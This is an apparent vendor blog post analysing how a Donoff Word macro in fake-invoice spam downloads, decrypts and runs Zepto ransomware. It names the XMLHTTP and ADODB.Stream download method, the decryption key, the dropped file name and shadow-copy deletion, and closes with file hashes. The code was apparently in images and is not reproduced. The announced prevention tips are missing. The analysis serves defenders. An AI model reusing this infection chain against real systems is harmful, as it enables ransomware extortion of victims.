Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key.
We decided to take a closer look on the Donoff macro used in downloading the Zepto ransomware. Here’s what we found:
The VBA Macro code
At first glance, the code is fully commented in Spanish and uses some random generated variable names.
Here a look at the code:
The Word document contains two macro functions, autoopen and ActualizarEntrada.
Here are more snips of code showing the processing of obfuscated text.
These are the strings revealed after deobfuscation.
This VBScript uses Microsoft.XMLHTTP and Adodb.Stream Objects to download Zepto.
The Microsoft.XMLHTTP object is one of Microsoft’s XML DOM (Document Object Model) modules that is intended to deliver client-side access to XML documents on remote servers through the HTTP protocol. This object is used to request or send any type of document.
The ADODB.Stream Object is used to read, write and manage a stream of binary data or text.
The following code decrypts to
Here’s the code that downloads the encrypted Zepto executable file.
The encrypted file is stored to the file system as TempWFDSAdrweg. It then uses this key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt and stores the decrypted binary to the file sysdrubpas.exe in the %temp% folder. %temp% folder is usually the C:\Users\<username>\AppData\Local\Temp folder.
Encrypted Zepto (Displayed here in Hexadecimals):
Decrypted Zepto (now in Executable form):
The script then executes sysdrubpas.exe infecting the system of the user.
ThreatAnalyzer – Malware Sandbox Analysis
When executed in our malware analysis sandbox ThreatAnalyzer, here’s the process tree caused by the malicious Word document
One notable common behavior of ransomware is how it deletes shadow copies to prevent easy restoration from Windows backup.
Other behaviors are very similar to our previous post about Zepto ransomware: https://blog.threattrack.com/ransomware-packed-into-wsf-spam/.
Prevent Ransomware Infections?
To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:
e98aee56175daaa96f259d04077d820f – malicious DOC attachment (Trojan-Downloader.O97M.Donoff.by (v))
837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)
Analysis by Wilmina Elizon